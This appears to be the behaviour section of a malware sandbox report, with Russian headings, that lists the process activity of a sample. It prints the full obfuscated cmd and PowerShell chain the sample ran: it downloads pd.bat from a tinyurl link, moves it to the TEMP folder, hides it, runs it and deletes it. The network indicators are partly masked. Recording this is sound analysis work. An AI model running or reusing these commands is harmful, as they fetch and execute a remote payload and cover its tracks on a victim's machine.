Техническая информация
- '<SYSTEM32>\cmd.exe' /k p^owershel^l -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"
- '<SYSTEM32>\cmd.exe' /k p^owershel^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
- '<SYSTEM32>\cmd.exe' /k p^owershel^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
- '<SYSTEM32>\cmd.exe' /k p^owershel^l -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"
- '<SYSTEM32>\cmd.exe' /k powershel^l -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y2lwkgdg','pd.bat')
- '35.##7.252.233':80
- 'ti##url.com':443
- DNS ASK ti##url.com
- '<SYSTEM32>\cmd.exe' /k p^owershel^l -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /k p^owershel^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /k p^owershel^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /k p^owershel^l -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /k powershel^l -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y2lwkgdg','pd.bat')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y2lwkgdg','pd.bat')
- '<SYSTEM32>\attrib.exe' +s +h pd.bat